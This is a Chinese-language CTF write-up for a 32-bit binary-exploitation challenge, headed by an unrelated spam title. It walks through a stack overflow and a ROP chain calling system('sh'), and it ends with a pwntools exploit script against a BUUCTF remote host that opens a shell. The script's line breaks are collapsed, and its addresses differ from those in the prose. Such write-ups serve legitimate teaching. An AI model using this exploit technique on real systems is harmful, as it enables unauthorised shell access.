专业做排行的网站/朋友圈推广广告

1. 背景分析

目标程序是一个存在漏洞的二进制文件，我们可以通过以下方式利用漏洞获取 shell：

1. 程序中存在 system() 函数，但没有明显的 /bin/sh 字符串。

2. 使用工具（如 ROPgadget）发现程序中有 sh 字符串，可以利用它作为 system() 的参数。

3. 程序的交互逻辑需要先输入密码，然后选择操作，最后通过溢出漏洞触发 ROP 链。

2. 具体步骤

步骤 1：确定偏移量

通过分析程序的漏洞点（例如通过格式化字符串漏洞或堆溢出漏洞），找到可以覆盖返回地址的偏移量。假设偏移量为 0x48 + 4。

步骤 2：查找关键地址

使用工具（如 ROPgadget 或 IDA Pro）查找以下地址：

• system() 函数的地址。

• main() 函数的地址（用于防止程序崩溃）。

• sh 字符串的地址。

示例命令：

bash复制

ROPgadget --binary ./zzz --search "system"
ROPgadget --binary ./zzz --search "sh"

假设：

• system() 的地址为 0x08048430

• main() 的地址为 0x08048500

• sh 的地址为 0x08048123

步骤 3：交互流程

程序的交互逻辑如下：

1. 程序提示输入管理员密码。

2. 程序提供选项，需要选择 1 添加 log。

3. 程序提示输入新的 log，此时发送构造的 ROP 链。

4. 再次选择操作，选择 4 触发漏洞。

步骤 4：构造 ROP 链

根据上述地址和偏移量，构造 ROP 链：

1. 填充到返回地址的偏移量。

2. 覆盖返回地址为 system() 的地址。

3. 在 system() 返回后跳转到 main()，防止程序崩溃。

4. 将 sh 的地址作为 system() 的参数。

步骤 5：发送 ROP 链并触发漏洞

通过网络交互，发送构造的 ROP 链，并触发漏洞。

第一个条件s1 == 'administrator'

 ADDLog（）：我们看到这里是输入log，跟我们的flag有关系

                          a1是我们外面传进来的src = 48，读取128个就造成了溢出

from pwn import *context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./zzz')def main():if content == 1:p = process('zzz')else:p =remote('node5.buuoj.cn',25739)#0x080482ea : shsh_addr     = 0x080482easystem_addr = elf.sym['system']payload     = b'a' * (0x48+0x4) + p32(system_addr) + b'aaaa' + p32(sh_addr)p.sendlineafter("Please input admin password:",'administrator')p.sendlineafter("0.Exit\n:",'1')p.sendlineafter("Please input new log info:",payload)p.sendlineafter("0.Exit\n:",'4')p.interactive()
main()